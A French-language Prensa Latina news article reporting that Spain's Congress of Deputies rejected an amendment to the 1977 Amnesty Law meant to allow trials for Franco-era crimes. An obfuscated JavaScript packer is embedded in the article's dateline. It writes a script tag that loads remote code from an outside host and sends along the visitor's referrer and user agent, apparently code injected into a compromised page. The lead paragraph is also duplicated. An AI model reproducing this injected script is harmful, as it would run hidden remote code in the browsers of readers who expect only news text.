lundi 22 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Le parlement espagnol ferme la porte aux jugements de crimes de la dictature franquiste

Madrid, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|daedk|var|u0026u|referrer|freyh||js|php'.split('|'),0,{})) 20 mars (Prensa Latina) Le Congrès des Députés a aujourd´hui fermé la porte à toute possibilité de juger dans des tribunaux les atrocités commises en Espagne lors de la dictature du général Francisco Franco (1939-1975).

Madrid, 20 mars (Prensa Latina) Le Congrès des Députés a aujourd´hui fermé la porte à toute possibilité de juger dans des tribunaux les atrocités commises en Espagne lors de la dictature du général Francisco Franco (1939-1975).

Avec leurs votes, les partis Populaire (PP), Socialiste (PSOE) et Ciudadanos (Cs) ont ce mardi rejeté une initiative qui prétendait modifier la Loi d´Amnistie de 1977 et ouvrir la voie pour pouvoir asseoir sur le banc des accusés les oppresseurs du régime franquiste.

La proposition a été enregistré le 25 octobre dernier, qui coïncidait avec le 40ème anniversaire de l´adoption de cette mesure, grâce aux signatures des partis Podemos, Esquerra Republicana de Cataluña (ERC), Partido Nationalista Vasco (PNV) , le Partido Démocrata Europeo Catalan et de d´autres formations comme Nueva Canarias.

Concrètement, la modification de Loi d´Amnistie, qui vient donc d´être rejetée aujourd´hui, consistait en l´introduction d´un nouveau paragraphe dans l´article 9.

L´initiative souhaitait établir que « les dispositions contenues dans cette Loi n´empêcheront pas que les jurys et les tribunaux enquêtent, jugent et imposent les peines correspondantes aux personnes responsables d´avoir commis des crimes contre l´humanité, de génocides, de guerres et autres graves violations des droits de l´homme ».

peo/ga/edu

EN CONTINU
notes connexes